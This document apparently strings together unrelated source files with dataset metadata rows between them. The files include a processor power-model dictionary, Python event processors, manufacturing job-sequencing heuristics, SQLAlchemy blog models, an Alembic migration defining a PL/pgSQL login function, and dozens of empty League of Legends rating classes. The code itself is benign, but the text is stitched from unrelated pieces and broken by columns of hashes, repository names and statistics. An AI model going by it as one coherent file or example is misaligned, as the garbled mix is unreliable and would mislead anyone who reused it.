'Runtime Dynamic': 7.213421027751713,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.290465,
'Runtime Dynamic': 0.103356,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 64.2906,
'Peak Power': 97.4029,
'Runtime Dynamic': 10.8956,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 64.0002,
'Total Cores/Runtime Dynamic': 10.7922,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.290465,
'Total L3s/Runtime Dynamic': 0.103356,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.110503
| 124
| 0.68219
| 8,088
| 68,651
| 5.784496
| 0.067631
| 0.123458
| 0.112857
| 0.093363
| 0.938784
| 0.930918
| 0.918542
| 0.887785
| 0.862777
| 0.842108
| 0
| 0.132407
| 0.224192
| 68,651
| 914
| 125
| 75.110503
| 0.74602
| 0
| 0
| 0.642232
| 0
| 0
| 0.657009
| 0.048069
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
985a5c8b8ba0d5db2851ae3ff2d0a5e82e87720a
| 218
|
py
|
Python
|
infrabbitmq/events_processors.py
|
aleasoluciones/infrabbitmq3
|
5a5f5cf7e4fbcdae659855edcbf1b8c2d007f69f
|
[
"MIT"
] | null | null | null |
infrabbitmq/events_processors.py
|
aleasoluciones/infrabbitmq3
|
5a5f5cf7e4fbcdae659855edcbf1b8c2d007f69f
|
[
"MIT"
] | null | null | null |
infrabbitmq/events_processors.py
|
aleasoluciones/infrabbitmq3
|
5a5f5cf7e4fbcdae659855edcbf1b8c2d007f69f
|
[
"MIT"
] | 1
|
2019-04-15T06:38:30.000Z
|
2019-04-15T06:38:30.000Z
|
class NoopProcessor:
def process(self, event):
pass
class ConsoleLogEventsProcessor:
def process(self, event):
print(f'{event.timestamp} {event.network} {event.name} {event.id} {event.data}')
| 24.222222
| 88
| 0.674312
| 25
| 218
| 5.88
| 0.6
| 0.136054
| 0.190476
| 0.258503
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192661
| 218
| 8
| 89
| 27.25
| 0.835227
| 0
| 0
| 0.333333
| 0
| 0.166667
| 0.321101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0
| 0
| 0.666667
| 0.166667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
987d184c08d3d081f6a0f131040bc0f6cde9af2c
| 287
|
py
|
Python
|
platform/hwconf_data/mgm12/modules/WTIMER1/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | null | null | null |
platform/hwconf_data/mgm12/modules/WTIMER1/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T02:36:22.000Z
|
2020-08-25T02:36:22.000Z
|
platform/hwconf_data/mgm12/modules/WTIMER1/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T01:56:04.000Z
|
2020-08-25T01:56:04.000Z
|
import mgm12.halconfig.halconfig_types as halconfig_types
import mgm12.halconfig.halconfig_dependency as halconfig_dependency
import mgm12.PythonSnippet.ExporterModel as ExporterModel
import mgm12.PythonSnippet.RuntimeModel as RuntimeModel
import mgm12.PythonSnippet.Metadata as Metadata
| 57.4
| 67
| 0.898955
| 34
| 287
| 7.470588
| 0.294118
| 0.216535
| 0.283465
| 0.228346
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037313
| 0.066202
| 287
| 5
| 68
| 57.4
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7f63e14347c4733d5946190bb96be04956f29451
| 14
|
py
|
Python
|
1_Datentypen/03_tuples/_02_short_swap_tricks.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_02_short_swap_tricks.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_02_short_swap_tricks.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
x = 7
y = 11
| 3.5
| 6
| 0.357143
| 4
| 14
| 1.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 0.5
| 14
| 3
| 7
| 4.666667
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f8f9a40898f73a30a1fe420409f50885da5f3c5
| 540
|
py
|
Python
|
train_medseg_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_medseg_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_medseg_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/train_medseg_unetplusplus_timm-regnetx_002_fold0_posterize.yml",
"python main.py --configs configs/train_medseg_unetplusplus_timm-regnetx_002_fold1_posterize.yml",
"python main.py --configs configs/train_medseg_unetplusplus_timm-regnetx_002_fold2_posterize.yml",
"python main.py --configs configs/train_medseg_unetplusplus_timm-regnetx_002_fold3_posterize.yml",
"python main.py --configs configs/train_medseg_unetplusplus_timm-regnetx_002_fold4_posterize.yml",
]
for l in ls:
os.system(l)
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f689a957217b635de2d19c5dbdf35e3d663f3620
| 43
|
py
|
Python
|
hcap_utils/contrib/decorators/__init__.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | null | null | null |
hcap_utils/contrib/decorators/__init__.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | 31
|
2020-04-11T13:38:17.000Z
|
2021-09-22T18:51:11.000Z
|
hcap_utils/contrib/decorators/__init__.py
|
fabiommendes/capacidade_hospitalar
|
4f675b574573eb3f51e6be8a927ea230bf2712c7
|
[
"MIT"
] | 1
|
2020-04-12T17:51:20.000Z
|
2020-04-12T17:51:20.000Z
|
from .model_property import model_property
| 21.5
| 42
| 0.883721
| 6
| 43
| 6
| 0.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 1
| 43
| 43
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1004327714c791643ad32bc3b65931d216210cb3
| 8,083
|
py
|
Python
|
lib/toolbox/sequencing_functions.py
|
S1ang0/NEAT_THFS
|
774b4f9f689855eebf5d5c8ca1b8aafe7bbfcea6
|
[
"MIT"
] | 1
|
2021-02-17T08:57:48.000Z
|
2021-02-17T08:57:48.000Z
|
lib/toolbox/sequencing_functions.py
|
S1ang0/NEAT_THFS
|
774b4f9f689855eebf5d5c8ca1b8aafe7bbfcea6
|
[
"MIT"
] | null | null | null |
lib/toolbox/sequencing_functions.py
|
S1ang0/NEAT_THFS
|
774b4f9f689855eebf5d5c8ca1b8aafe7bbfcea6
|
[
"MIT"
] | 1
|
2021-02-21T20:56:01.000Z
|
2021-02-21T20:56:01.000Z
|
def pre_sequencing_4_input_neurons(dataset, ann, *args, **kwargs):
"""
Generates an initial job sequence based on the priorization of
an artificial neural network. The job sequence will be feed to the model.
Input features:
---------------
* job's due date
* job's family
* job's t_smd
* job's t_aoi
"""
sequence = []
for job in dataset.values():
features = [
job["scaled due date"],
job["scaled family"],
job["scaled t_smd"],
job["scaled t_aoi"],
]
ann_output = ann.activate(features)
job[9] = ann_output
if sequence == []:
sequence.append(job)
else:
sequencing_successful = False
for previous_job in sequence:
if job[9] > previous_job[9]:
sequence.insert(sequence.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
sequence.append(job)
return sequence
def post_sequencing_5_input_neurons(self, job, smd, *args, **kwargs):
"""
Inserts job in the buffer of the selected SMD according to the
priorization of an artificial neural network.
Input features:
---------------
* job's due date
* job's family
* job's t_smd
* job's t_aoi
* setup type of allocated SMD
"""
# 1. Create feature vector for ANN
features = [
job.duedate_scaled,
job.family_scaled,
job.t_smd_scaled,
job.t_aoi_scaled,
smd.setuptype_scaled,
]
# 2. Forward propagation
job.priority = self.post_sequencing_ann.activate(features)
# 3. Insert job in sequence
queue = smd.buffer
if queue == []:
queue.append(job)
else:
sequencing_successful = False
for previous_job in queue:
if job.priority > previous_job.priority:
queue.insert(queue.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
queue.append(job)
def fifo_pre_sequencing(dataset, *args, **kwargs):
"""
Generates an initial job sequence based on the first-in-first-out
dispatching strategy. The job sequence will be feed to the model.
"""
sequence = [job for job in dataset.values()]
return sequence
def fifo_post_sequencing(self, job, smd, *args, **kwargs):
"""
Inserts job in the buffer of the selected SMD according to the
first-in-first-out dispatching strategy
"""
queue = smd.buffer
queue.append(job)
def lifo_pre_sequencing(dataset, *args, **kwargs):
"""
Generates an initial job sequence based on the last-in-first-out
dispatching strategy. The job sequence will be feed to the model.
"""
sequence = []
for job in dataset.values():
sequence.insert(0, job)
return sequence
def lifo_post_sequencing(self, job, smd, *args, **kwargs):
"""
Inserts job in the buffer of the selected SMD according to the
last-in-first-out dispatching strategy
"""
queue = smd.buffer
queue.insert(0, job)
def edd_pre_sequencing(dataset, *args, **kwargs):
"""
Generates an initial job sequence based on the earliest-due-date
dispatching strategy. The job sequence will be feed to the model.
"""
sequence = []
for job in dataset.values():
if sequence == []:
sequence.append(job)
else:
sequencing_successful = False
for previous_job in sequence:
if job["due date"] < previous_job["due date"]:
sequence.insert(sequence.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
sequence.append(job)
return sequence
def edd_post_sequencing(self, job, smd, *args, **kwargs):
"""
Inserts job in the buffer of the selected SMD according to the
earliest-due-date dispatching strategy
"""
queue = smd.buffer
if queue == []:
queue.append(job)
else:
sequencing_successful = False
for previous_job in queue:
if job.duedate < previous_job.duedate:
queue.insert(queue.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
queue.append(job)
def spt_pre_sequencing(dataset, *args, **kwargs):
"""
Generates an initial job sequence based on the shortest-processing-time
dispatching strategy. The job sequence will be feed to the model.
"""
sequence = []
for job in dataset.values():
if sequence == []:
sequence.append(job)
else:
sequencing_successful = False
for previous_job in sequence:
if (job["t_smd"] + job["t_aoi"]) < (
previous_job["t_smd"] + previous_job["t_aoi"]
):
sequence.insert(sequence.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
sequence.append(job)
return sequence
def spt_post_sequencing(self, job, smd, *args, **kwargs):
"""
Inserts job in the buffer of the selected SMD according to the
shortest-processing-time dispatching strategy
"""
queue = smd.buffer
if queue == []:
queue.append(job)
else:
sequencing_successful = False
for previous_job in queue:
if (job.t_smd + job.t_aoi) < (previous_job.t_smd + previous_job.t_aoi):
queue.insert(queue.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
queue.append(job)
def edd_x_spt_pre_sequencing(dataset, w_edd=0.5, w_spt=0.5, *args, **kwargs):
"""
Generates an initial job sequence based on a weighted combination of
the earliest-due-date and the shortest-processing-time
dispatching strategy. The job sequence will be feed to the model.
"""
sequence = [job for job in dataset.values()]
# sort and rank according to edd
sequence = sorted(sequence, key=lambda job: job["due date"])
rank = 1
prev_job = None
for job in sequence:
if prev_job and job["due date"] != prev_job["due date"]:
rank += 1
job["rank"] = rank
prev_job = job
# sort and rank according to spt and create joint edd_spt_rank
sequence = sorted(sequence, key=lambda job: job["t_smd"] + job["t_aoi"])
rank = 1
prev_job = None
for job in sequence:
if (
prev_job
and job["t_smd"] + job["t_aoi"] != prev_job["t_smd"] + prev_job["t_aoi"]
):
rank += 1
job["rank"] = w_edd * job["rank"] + w_spt * rank
# sort according to joint edd_spt_rank
sequence = sorted(sequence, key=lambda job: job["rank"])
return sequence
def edd_x_spt_post_sequencing(self, job, smd, w_edd=0.5, w_spt=0.5):
"""
Inserts job in the buffer of the selected SMD according to a weighted
combination of the earliest-due-date and the shortest-processing-time
dispatching strategy. The job sequence will be feed to the model.
"""
queue = smd.buffer
if queue == []:
queue.append(job)
else:
sequencing_successful = False
for previous_job in queue:
if ((w_edd * job.duedate) + (w_spt * (job.t_smd + job.t_aoi))) < (
(w_edd * previous_job.duedate)
+ (w_spt * (previous_job.t_smd + previous_job.t_aoi))
):
queue.insert(queue.index(previous_job), job)
sequencing_successful = True
break
if sequencing_successful == False:
queue.append(job)
| 27.968858
| 84
| 0.592354
| 997
| 8,083
| 4.667001
| 0.104313
| 0.059102
| 0.07522
| 0.027079
| 0.831936
| 0.815173
| 0.78358
| 0.754997
| 0.749839
| 0.712014
| 0
| 0.003962
| 0.313003
| 8,083
| 288
| 85
| 28.065972
| 0.833964
| 0.250031
| 0
| 0.688312
| 1
| 0
| 0.027393
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077922
| false
| 0
| 0
| 0
| 0.116883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63dceb467b09a851349694788be80ca6d1a47223
| 1,301
|
py
|
Python
|
models.py
|
JiminLeeDev/JMBlog
|
a8079aa4533b887bbb1c65cfe75d63232a7f3938
|
[
"MIT"
] | 1
|
2021-12-22T17:56:46.000Z
|
2021-12-22T17:56:46.000Z
|
models.py
|
JiminLeeDev/JMBlog
|
a8079aa4533b887bbb1c65cfe75d63232a7f3938
|
[
"MIT"
] | null | null | null |
models.py
|
JiminLeeDev/JMBlog
|
a8079aa4533b887bbb1c65cfe75d63232a7f3938
|
[
"MIT"
] | null | null | null |
from flask.helpers import flash
from sqlalchemy.orm import backref
from JMBlog import db
class Account(db.Model):
id = db.Column(db.String(20), primary_key=True)
password = db.Column(db.String(20), nullable=False)
nickname = db.Column(db.String(20), nullable=False)
comment_id = db.Column(
db.Integer, db.ForeignKey("comment.id", ondelete="CASCADE"), nullable=True
)
post_id = db.Column(
db.Integer, db.ForeignKey("post.id", ondelete="CASCADE"), nullable=True
)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(200), nullable=False)
content = db.Column(db.Text(), nullable=False)
create_date = db.Column(db.DateTime(), nullable=False)
account_id = db.Column(db.Integer, db.ForeignKey("account.id"))
comment_id = db.Column(
db.Integer, db.ForeignKey("comment.id", ondelete="CASCADE"), nullable=True
)
class Comment(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(200), nullable=False)
content = db.Column(db.Text(), nullable=False)
create_date = db.Column(db.DateTime(), nullable=False)
account_id = db.Column(db.Integer, db.ForeignKey("account.id"))
post_id = db.Column(db.Integer, db.ForeignKey("post.id"))
| 35.162162
| 82
| 0.686395
| 185
| 1,301
| 4.767568
| 0.2
| 0.154195
| 0.192744
| 0.122449
| 0.854875
| 0.845805
| 0.782313
| 0.712018
| 0.712018
| 0.712018
| 0
| 0.010989
| 0.160646
| 1,301
| 36
| 83
| 36.138889
| 0.796703
| 0
| 0
| 0.482759
| 0
| 0
| 0.057648
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.034483
| 0.103448
| 0
| 0.793103
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
63eee150cb953b333eeef4cd433bac343d0fa65e
| 4,558
|
py
|
Python
|
app/lib/pushkin/pushkin/database/migrations/versions/70ad8e4607cd_fix_process_user_login.py
|
krzyhook/pushkin-on-docker
|
05d192d0b4c753bcd41aba0a66394ae39dd78fc6
|
[
"MIT"
] | null | null | null |
app/lib/pushkin/pushkin/database/migrations/versions/70ad8e4607cd_fix_process_user_login.py
|
krzyhook/pushkin-on-docker
|
05d192d0b4c753bcd41aba0a66394ae39dd78fc6
|
[
"MIT"
] | null | null | null |
app/lib/pushkin/pushkin/database/migrations/versions/70ad8e4607cd_fix_process_user_login.py
|
krzyhook/pushkin-on-docker
|
05d192d0b4c753bcd41aba0a66394ae39dd78fc6
|
[
"MIT"
] | null | null | null |
"""fix process_user_login
Revision ID: 70ad8e4607cd
Revises: 822b8de2c260
Create Date: 2016-08-02 15:13:08.896451
"""
# revision identifiers, used by Alembic.
revision = '70ad8e4607cd'
down_revision = '822b8de2c260'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
func_process_user_login_new="""
CREATE OR REPLACE FUNCTION "process_user_login" (
p_login_id int8,
p_language_id int2,
p_platform_id int2,
p_device_token text,
p_application_version int4,
p_max_devices_per_user int2
)
RETURNS "pg_catalog"."void" AS
$body$
BEGIN
WITH
data(login_id, language_id) AS (
VALUES(p_login_id, p_language_id)
),
update_part AS (
UPDATE login
SET language_id = d.language_id
FROM data d
WHERE login.id = d.login_id
RETURNING d.*
)
INSERT INTO login
(id, language_id)
SELECT d.login_id, d.language_id
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id);
WITH
data_tmp(login_id, platform_id, device_token, application_version) AS (
VALUES(p_login_id, p_platform_id, p_device_token, p_application_version)
),
data AS (
SELECT * FROM data_tmp WHERE device_token IS NOT NULL
),
update_part AS (
UPDATE device SET
application_version = d.application_version,
unregistered_ts = NULL
FROM data d
WHERE (device.device_token = d.device_token OR device.device_token_new = d.device_token)
AND device.login_id = d.login_id
AND device.platform_id = d.platform_id
RETURNING d.*
)
INSERT INTO device(login_id, platform_id, device_token, application_version)
SELECT d.login_id, d.platform_id, d.device_token, d.application_version
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id
AND u.platform_id = d.platform_id
AND u.device_token = d.device_token);
WITH
devices_ordered AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY login_id ORDER BY unregistered_ts DESC NULLS FIRST, id DESC) AS device_order
FROM device
WHERE login_id = p_login_id
),
devices_to_delete AS (
SELECT *
FROM devices_ordered
WHERE device_order > p_max_devices_per_user
)
DELETE FROM device
WHERE id IN (SELECT id FROM devices_to_delete);
END;
$body$
LANGUAGE 'plpgsql'
VOLATILE
CALLED ON NULL INPUT
SECURITY INVOKER;
"""
func_process_user_login_old = """
CREATE OR REPLACE FUNCTION "process_user_login" (
p_login_id int8,
p_language_id int2,
p_platform_id int2,
p_device_token text,
p_application_version int4,
p_max_devices_per_user int2
)
RETURNS "pg_catalog"."void" AS
$body$
BEGIN
WITH
data(login_id, language_id) AS (
VALUES(p_login_id, p_language_id)
),
update_part AS (
UPDATE login
SET language_id = d.language_id
FROM data d
WHERE login.id = d.login_id
RETURNING d.*
)
INSERT INTO login
(id, language_id)
SELECT d.login_id, d.language_id
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id);
WITH
data_tmp(login_id, platform_id, device_token, application_version) AS (
VALUES(p_login_id, p_platform_id, p_device_token, p_application_version)
),
data AS (
SELECT * FROM data_tmp WHERE device_token IS NOT NULL
),
update_part AS (
UPDATE device
SET application_version = d.application_version
FROM data d
WHERE device.device_token = d.device_token
AND device.login_id = d.login_id
AND device.platform_id = d.platform_id
RETURNING d.*
)
INSERT INTO device(login_id, platform_id, device_token, application_version)
SELECT d.login_id, d.platform_id, d.device_token, d.application_version
FROM data d
WHERE NOT EXISTS (
SELECT 1
FROM update_part u
WHERE u.login_id = d.login_id
AND u.platform_id = d.platform_id
AND u.device_token = d.device_token);
WITH
devices_ordered AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY login_id ORDER BY unregistered_ts DESC NULLS FIRST, id DESC) AS device_order
FROM device
WHERE login_id = p_login_id
),
devices_to_delete AS (
SELECT *
FROM devices_ordered
WHERE device_order > p_max_devices_per_user
)
DELETE FROM device
WHERE id IN (SELECT id FROM devices_to_delete);
END;
$body$
LANGUAGE 'plpgsql'
VOLATILE
CALLED ON NULL INPUT
SECURITY INVOKER;
"""
def upgrade():
op.execute(func_process_user_login_new)
op.execute("UPDATE device SET unregistered_ts = NULL;")
def downgrade():
op.execute(func_process_user_login_old)
| 23.989474
| 111
| 0.730145
| 711
| 4,558
| 4.390999
| 0.146273
| 0.089686
| 0.03075
| 0.035874
| 0.891736
| 0.87508
| 0.856502
| 0.856502
| 0.856502
| 0.856502
| 0
| 0.017568
| 0.200746
| 4,558
| 189
| 112
| 24.116402
| 0.839418
| 0.033129
| 0
| 0.833333
| 0
| 0
| 0.919477
| 0.066983
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011905
| false
| 0
| 0.011905
| 0
| 0.02381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
120c0cad825a5c6b87c8608fa70a02d84ff459ea
| 138
|
py
|
Python
|
naturtag/utils/__init__.py
|
JWCook/inat-image-tagger
|
2ba48ec849517b32cee1bfe9527f838a4f22cd94
|
[
"MIT"
] | 1
|
2020-05-10T23:17:07.000Z
|
2020-05-10T23:17:07.000Z
|
naturtag/utils/__init__.py
|
JWCook/inat-image-tagger
|
2ba48ec849517b32cee1bfe9527f838a4f22cd94
|
[
"MIT"
] | 13
|
2020-05-23T14:56:39.000Z
|
2020-05-24T03:35:21.000Z
|
naturtag/utils/__init__.py
|
JWCook/inat-image-tagger
|
2ba48ec849517b32cee1bfe9527f838a4f22cd94
|
[
"MIT"
] | null | null | null |
# flake8: noqa: F401
from naturtag.utils.image_glob import get_valid_image_paths
from naturtag.utils.thumbnails import generate_thumbnail
| 34.5
| 59
| 0.862319
| 20
| 138
| 5.7
| 0.75
| 0.210526
| 0.298246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.086957
| 138
| 3
| 60
| 46
| 0.873016
| 0.130435
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1210679789086016e140acb1ffa21bfaaf704120
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_janna/na_janna_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_janna/na_janna_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_janna/na_janna_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Janna_Top_Aatrox(Ratings):
pass
class NA_Janna_Top_Ahri(Ratings):
pass
class NA_Janna_Top_Akali(Ratings):
pass
class NA_Janna_Top_Alistar(Ratings):
pass
class NA_Janna_Top_Amumu(Ratings):
pass
class NA_Janna_Top_Anivia(Ratings):
pass
class NA_Janna_Top_Annie(Ratings):
pass
class NA_Janna_Top_Ashe(Ratings):
pass
class NA_Janna_Top_AurelionSol(Ratings):
pass
class NA_Janna_Top_Azir(Ratings):
pass
class NA_Janna_Top_Bard(Ratings):
pass
class NA_Janna_Top_Blitzcrank(Ratings):
pass
class NA_Janna_Top_Brand(Ratings):
pass
class NA_Janna_Top_Braum(Ratings):
pass
class NA_Janna_Top_Caitlyn(Ratings):
pass
class NA_Janna_Top_Camille(Ratings):
pass
class NA_Janna_Top_Cassiopeia(Ratings):
pass
class NA_Janna_Top_Chogath(Ratings):
pass
class NA_Janna_Top_Corki(Ratings):
pass
class NA_Janna_Top_Darius(Ratings):
pass
class NA_Janna_Top_Diana(Ratings):
pass
class NA_Janna_Top_Draven(Ratings):
pass
class NA_Janna_Top_DrMundo(Ratings):
pass
class NA_Janna_Top_Ekko(Ratings):
pass
class NA_Janna_Top_Elise(Ratings):
pass
class NA_Janna_Top_Evelynn(Ratings):
pass
class NA_Janna_Top_Ezreal(Ratings):
pass
class NA_Janna_Top_Fiddlesticks(Ratings):
pass
class NA_Janna_Top_Fiora(Ratings):
pass
class NA_Janna_Top_Fizz(Ratings):
pass
class NA_Janna_Top_Galio(Ratings):
pass
class NA_Janna_Top_Gangplank(Ratings):
pass
class NA_Janna_Top_Garen(Ratings):
pass
class NA_Janna_Top_Gnar(Ratings):
pass
class NA_Janna_Top_Gragas(Ratings):
pass
class NA_Janna_Top_Graves(Ratings):
pass
class NA_Janna_Top_Hecarim(Ratings):
pass
class NA_Janna_Top_Heimerdinger(Ratings):
pass
class NA_Janna_Top_Illaoi(Ratings):
pass
class NA_Janna_Top_Irelia(Ratings):
pass
class NA_Janna_Top_Ivern(Ratings):
pass
class NA_Janna_Top_Janna(Ratings):
pass
